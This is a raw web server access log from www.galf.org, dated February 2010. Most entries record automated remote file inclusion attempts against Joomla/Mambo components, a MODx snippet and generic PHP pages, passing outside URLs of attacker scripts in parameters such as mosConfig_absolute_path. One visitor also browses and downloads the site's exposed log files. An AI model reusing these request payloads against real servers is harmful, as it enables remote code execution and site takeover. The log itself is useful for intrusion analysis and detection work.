66.102.237.81 - - [01/Feb/2010:04:42:04 -0800] "GET /logs/access_090817.log///?mosConfig.absolute.path=http://www.cipam.com/components/com_frontpage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [01/Feb/2010:04:42:04 -0800] "GET //?mosConfig.absolute.path=http://www.cipam.com/components/com_frontpage/id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [01/Feb/2010:04:42:04 -0800] "GET /logs///?mosConfig.absolute.path=http://www.cipam.com/components/com_frontpage/id1.txt? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
222.122.158.94 - - [01/Feb/2010:04:43:26 -0800] "GET //administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://atlantadigital.com///sh/idi.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.galf.org"
222.122.158.94 - - [01/Feb/2010:04:43:26 -0800] "GET /logs///administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://atlantadigital.com///sh/idi.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.galf.org"
69.90.47.134 - - [01/Feb/2010:04:44:27 -0800] "GET /logs/access_090907.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
69.90.47.134 - - [01/Feb/2010:04:44:27 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
69.90.47.134 - - [01/Feb/2010:04:44:28 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
211.193.131.164 - - [01/Feb/2010:04:45:59 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.193.131.164 - - [01/Feb/2010:04:45:59 -0800] "GET /logs/access_090803.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.193.131.164 - - [01/Feb/2010:04:45:59 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.193.131.164 - - [01/Feb/2010:04:46:08 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.193.131.164 - - [01/Feb/2010:04:46:08 -0800] "GET /logs/access_090803.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.193.131.164 - - [01/Feb/2010:04:46:10 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
92.127.69.225 - - [01/Feb/2010:04:47:03 -0800] "GET /logs/ HTTP/1.1" 200 4942 "http://www.google.ru/search?hl=ru&newwindow=1&q=Index+of+cart%2Fcart.log&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA&lr=&aq=f&oq=" "Opera/9.52 (Windows NT 5.1; U; ru)" "www.galf.org"
92.127.69.225 - - [01/Feb/2010:04:47:10 -0800] "GET /favicon.ico HTTP/1.1" 404 - "http://www.galf.org/logs/" "Opera/9.52 (Windows NT 5.1; U; ru)" "www.galf.org"
66.102.237.81 - - [01/Feb/2010:04:47:34 -0800] "GET /logs/access.log%20%20///?mosConfig.absolute.path=http://www.cipam.com/components/com_frontpage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
66.102.237.81 - - [01/Feb/2010:04:47:34 -0800] "GET /logs///?mosConfig.absolute.path=http://www.cipam.com/components/com_frontpage/id1.txt? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "galf.org"
66.102.237.81 - - [01/Feb/2010:04:47:34 -0800] "GET //?mosConfig.absolute.path=http://www.cipam.com/components/com_frontpage/id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
92.127.69.225 - - [01/Feb/2010:04:48:09 -0800] "GET /logs/access_090907.log HTTP/1.1" 200 851968 "http://www.galf.org/logs/" "Opera/9.52 (Windows NT 5.1; U; ru)" "www.galf.org"
92.127.69.225 - - [01/Feb/2010:04:48:20 -0800] "GET /logs/scripts.log HTTP/1.1" 200 786432 "http://www.galf.org/logs/" "Opera/9.52 (Windows NT 5.1; U; ru)" "www.galf.org"
115.68.3.94 - - [01/Feb/2010:04:48:35 -0800] "GET /logs///administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.68.3.94 - - [01/Feb/2010:04:48:35 -0800] "GET /logs/access_090907.log///administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.68.3.94 - - [01/Feb/2010:04:48:35 -0800] "GET //administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.158.94 - - [01/Feb/2010:04:49:21 -0800] "GET /logs/access_090914.log///administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://atlantadigital.com///sh/idi.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.galf.org"
222.122.158.94 - - [01/Feb/2010:04:49:22 -0800] "GET /logs/access_090831.log///administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://atlantadigital.com///sh/idi.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.galf.org"
222.122.158.94 - - [01/Feb/2010:04:49:29 -0800] "GET /logs/access_090914.log///administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://atlantadigital.com///sh/idi.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.galf.org"
222.122.158.94 - - [01/Feb/2010:04:49:30 -0800] "GET /logs/access_090831.log///administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://atlantadigital.com///sh/idi.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.galf.org"
115.68.3.94 - - [01/Feb/2010:04:51:51 -0800] "GET /logs/access_100111.log///administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.203.198 - - [01/Feb/2010:04:52:15 -0800] "GET /login.php?includedir=http://b2751661.justfree.com/lo.txt?? HTTP/1.1" 404 - "-" "Advanced Browser (http://www.avantbrowser.com)" "www.galf.org"
85.17.203.198 - - [01/Feb/2010:04:52:19 -0800] "GET /logs/login.php?includedir=http://b2751661.justfree.com/lo.txt?? HTTP/1.1" 404 - "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:04:54:20 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:04:54:20 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:04:54:20 -0800] "GET /logs/access_090907.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:04:54:48 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:04:54:48 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:04:54:48 -0800] "GET /logs/access_090907.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.124.120.47 - - [01/Feb/2010:04:54:59 -0800] "GET /logs//index.php?page=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.galf.org"
94.124.120.47 - - [01/Feb/2010:04:55:00 -0800] "GET /index.php?page=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.galf.org"
94.124.120.47 - - [01/Feb/2010:04:55:00 -0800] "GET /index.php?page=http://www.pulsanim-interactive.fr/sql??&u=x HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.galf.org"
94.124.120.47 - - [01/Feb/2010:04:55:00 -0800] "GET /logs//index.php?page=http://www.pulsanim-interactive.fr/sql??&u=x HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:04:55:00 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:04:55:00 -0800] "GET /logs/access_090907.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:04:55:00 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:04:56:02 -0800] "GET /logs/access.log%20%20//index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.bookmarketingworks.com/css/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
79.170.45.126 - - [01/Feb/2010:04:56:02 -0800] "GET /logs//index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.bookmarketingworks.com/css/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
79.170.45.126 - - [01/Feb/2010:04:56:02 -0800] "GET /index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.bookmarketingworks.com/css/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
79.170.45.126 - - [01/Feb/2010:04:56:02 -0800] "GET /logs/access_090824.log%20%20//index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.bookmarketingworks.com/css/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:04:56:02 -0800] "GET /index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.bookmarketingworks.com/css/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:04:56:02 -0800] "GET /logs//index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.bookmarketingworks.com/css/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:04:56:26 -0800] "GET /index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.bookmarketingworks.com/css/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:04:56:26 -0800] "GET /logs//index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.bookmarketingworks.com/css/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:04:56:42 -0800] "GET /logs/access_090907.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:04:56:46 -0800] "GET /logs/access_090907.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:04:56:46 -0800] "GET /logs/access.log//index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.bookmarketingworks.com/css/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.37.162.130 - - [01/Feb/2010:04:56:48 -0800] "GET /logs/access_090907.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:04:56:49 -0800] "GET /logs/access_090727.log//index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.bookmarketingworks.com/css/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:04:56:49 -0800] "GET /index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.bookmarketingworks.com/css/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
79.170.45.126 - - [01/Feb/2010:04:56:49 -0800] "GET /logs//index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.bookmarketingworks.com/css/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
79.170.45.126 - - [01/Feb/2010:04:56:54 -0800] "GET /logs/access.log%20%20//index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
79.170.45.126 - - [01/Feb/2010:04:56:54 -0800] "GET /index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
79.170.45.126 - - [01/Feb/2010:04:56:54 -0800] "GET /logs//index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
79.170.45.126 - - [01/Feb/2010:04:56:54 -0800] "GET /logs/access_090824.log%20%20//index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:04:56:54 -0800] "GET /logs//index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:04:56:54 -0800] "GET /index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:04:56:57 -0800] "GET /logs/access_091102.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:04:57:03 -0800] "GET /logs/access_091102.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:04:57:03 -0800] "GET /logs/access_091102.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:04:57:19 -0800] "GET /logs/access_090727.log//index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.bookmarketingworks.com/css/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:04:57:19 -0800] "GET /logs/access.log//index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.bookmarketingworks.com/css/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.90.47.134 - - [01/Feb/2010:04:59:05 -0800] "GET /logs/access_090831.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:04:59:23 -0800] "GET /index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.yeonri.com/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
79.170.45.126 - - [01/Feb/2010:04:59:23 -0800] "GET /logs/access.log%20%20//index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.yeonri.com/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
79.170.45.126 - - [01/Feb/2010:04:59:23 -0800] "GET /logs//index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.yeonri.com/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
79.170.45.126 - - [01/Feb/2010:04:59:23 -0800] "GET /logs/access_090824.log%20%20//index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.yeonri.com/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:04:59:23 -0800] "GET /index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.yeonri.com/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:04:59:23 -0800] "GET /logs//index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.yeonri.com/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.68.3.94 - - [01/Feb/2010:04:59:32 -0800] "GET /logs/access_090907.log%20%20///administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:04:59:58 -0800] "GET /index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.yeonri.com/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
79.170.45.126 - - [01/Feb/2010:04:59:58 -0800] "GET /logs//index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.yeonri.com/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
79.170.45.126 - - [01/Feb/2010:04:59:58 -0800] "GET /logs/access.log%20%20//index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.yeonri.com/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
79.170.45.126 - - [01/Feb/2010:04:59:58 -0800] "GET /index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.yeonri.com/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:04:59:58 -0800] "GET /logs/access_090824.log%20%20//index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.yeonri.com/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:04:59:58 -0800] "GET /logs//index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.yeonri.com/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:05:00:36 -0800] "GET /logs/access_090803.log//index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.bookmarketingworks.com/css/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.68.3.94 - - [01/Feb/2010:05:00:47 -0800] "GET /logs/access_100111.log%20%20///administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:05:00:54 -0800] "GET /logs/access.log%20%20//index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.bookmarketingworks.com/css/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
79.170.45.126 - - [01/Feb/2010:05:00:54 -0800] "GET /logs/access_090824.log%20%20//index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.bookmarketingworks.com/css/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:05:00:55 -0800] "GET /logs/access_090824.log//index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.bookmarketingworks.com/css/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:05:01:08 -0800] "GET /logs/access_090831.log//index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.bookmarketingworks.com/css/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:05:01:21 -0800] "GET /logs/access.log//index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
79.170.45.126 - - [01/Feb/2010:05:01:21 -0800] "GET /logs/access_090727.log//index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:05:01:56 -0800] "GET /logs/access_090824.log//index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:05:02:17 -0800] "GET /logs/access_090831.log//index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [01/Feb/2010:05:04:07 -0800] "GET /logs/access_090907.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [01/Feb/2010:05:04:07 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [01/Feb/2010:05:04:07 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [01/Feb/2010:05:04:12 -0800] "GET /logs/access_091102.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [01/Feb/2010:05:04:21 -0800] "GET /logs/access_090907.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [01/Feb/2010:05:04:21 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [01/Feb/2010:05:04:21 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [01/Feb/2010:05:04:30 -0800] "GET /logs/access_091102.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:05:04:35 -0800] "GET /logs/access.log//index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.yeonri.com/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
79.170.45.126 - - [01/Feb/2010:05:04:38 -0800] "GET /logs/access_090727.log//index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.yeonri.com/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:05:04:51 -0800] "GET /logs/access_090831.log//index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.yeonri.com/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.3.150.104 - - [01/Feb/2010:05:04:59 -0800] "GET /index.php?pg=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.galf.org"
81.3.150.104 - - [01/Feb/2010:05:04:59 -0800] "GET /logs//index.php?pg=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.galf.org"
81.3.150.104 - - [01/Feb/2010:05:05:00 -0800] "GET /index.php?pg=http://www.pulsanim-interactive.fr/sql??&u=x HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.galf.org"
81.3.150.104 - - [01/Feb/2010:05:05:00 -0800] "GET /logs//index.php?pg=http://www.pulsanim-interactive.fr/sql??&u=x HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:05:05:19 -0800] "GET /logs/access_090803.log//index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.yeonri.com/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:05:05:19 -0800] "GET /logs/access_090824.log//index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.yeonri.com/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:05:05:26 -0800] "GET /logs/access.log//index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.yeonri.com/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
79.170.45.126 - - [01/Feb/2010:05:05:26 -0800] "GET /logs/access_090727.log//index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.yeonri.com/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [01/Feb/2010:05:05:30 -0800] "GET /logs/access_090831.log//index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.yeonri.com/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
